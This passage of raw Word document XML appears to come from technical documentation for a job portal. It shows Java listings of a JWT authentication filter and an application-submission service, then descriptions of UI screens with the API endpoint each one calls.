              <w:t xml:space="preserve">            jwt = authHeader.substring(7);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            try {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                username = jwtUtil.extractUsername(jwt);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            } catch (Exception e) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                logger.warn("JWT parsing failed: " + e.getMessage());</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 xml:space="preserve">        if (username != null &amp;&amp; SecurityContextHolder.getContext().getAuthentication() == null) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            UserDetails userDetails = this.userDetailsService.loadUserByUsername(username);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            if (jwtUtil.validateToken(jwt, userDetails)) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                UsernamePasswordAuthenticationToken authToken = </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                    new UsernamePasswordAuthenticationToken(userDetails, null, userDetails.getAuthorities());</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                authToken.setDetails(new WebAuthenticationDetailsSource().buildDetails(request));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                SecurityContextHolder.getContext().setAuthentication(authToken);</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 xml:space="preserve">        filterChain.doFilter(request, response);</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>20.2 Business Service: ApplicationService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicationService coordinates candidate submissions and recruiter status transitions. The @Transactional annotation guarantees that application creation and notification dispatch execute atomically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: ApplicationService.java - Atomic Application Submission</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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@Service</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@Transactional</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>public class ApplicationService {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    @Autowired private ApplicationRepository applicationRepo;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    @Autowired private JobRepository jobRepo;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    @Autowired private NotificationService notificationService;</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 xml:space="preserve">    public Application applyForJob(Long jobId, User candidate, String coverLetter) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        Job job = jobRepo.findById(jobId)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new ResourceNotFoundException("Job not found with id: " + jobId));</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 xml:space="preserve">        if (applicationRepo.existsByJobAndCandidate(job, candidate)) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            throw new DuplicateApplicationException("You have already applied for this position.");</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 xml:space="preserve">        Application application = Application.builder()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            .job(job)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            .candidate(candidate)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            .status(ApplicationStatus.APPLIED)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            .appliedAt(LocalDateTime.now())</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            .coverLetter(coverLetter)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            .build();</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 xml:space="preserve">        Application saved = applicationRepo.save(application);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        notificationService.createNotification(candidate, "Application Submitted", </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">            "Your application for " + job.getTitle() + " at " + job.getCompany().getName() + " was received.");</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        return saved;</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>UI Screen-by-Screen Deep Dive &amp; Visual Tour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Below is the complete visual documentation of all primary user interfaces across Candidate, Recruiter, and Administrator personas, captured directly from live application execution:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 1: GlobalCo Public Landing Page &amp; Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006427122.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 1: GlobalCo Public Landing Page &amp; Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Initial portal landing page welcoming candidates and employers with instant job title, location, and skill search inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Public (Unauthenticated &amp; Authenticated)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Find Jobs nav link, Sign In button, Register Free button, Hero search inputs (Job title, City/Remote, Skills), Search Jobs CTA button.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/jobs (pre-fetch featured requisitions), Client-side route transition to /jobs upon query submission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 2: Featured Engineering Opportunities Catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006432271.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 2: Featured Engineering Opportunities Catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Displays curated high-priority job cards from verified employers (Microsoft, Google, Amazon, Meta, Apple, Netflix).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Public / All Users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Company logo badge, job title, location pill (Bengaluru/Hybrid), experience pill, compensation range (₹18-28 LPA), Details button.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/jobs?featured=true -&gt; returns JSON list of JobDto items mapped to cards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 3: Job Filter &amp; Discovery Matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006446904.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 3: Job Filter &amp; Discovery Matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Multi-faceted job discovery view allowing granular filtering by experience tier and work mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Public / Candidates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Experience Level radio pills (Entry, Junior, Mid-Senior, Lead), Work Mode checkboxes (Remote, Hybrid, On-site), Reset button, Apply Filters CTA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/jobs?experience=MID_SENIOR&amp;workMode=HYBRID -&gt; updates displayed job count dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 4: Sign In Portal with 1-Click Demo Accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006464290.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 4: Sign In Portal with 1-Click Demo Accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Secure authentication screen with instant 1-click credential autofill pills for Candidate, Recruiter, and Admin personas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
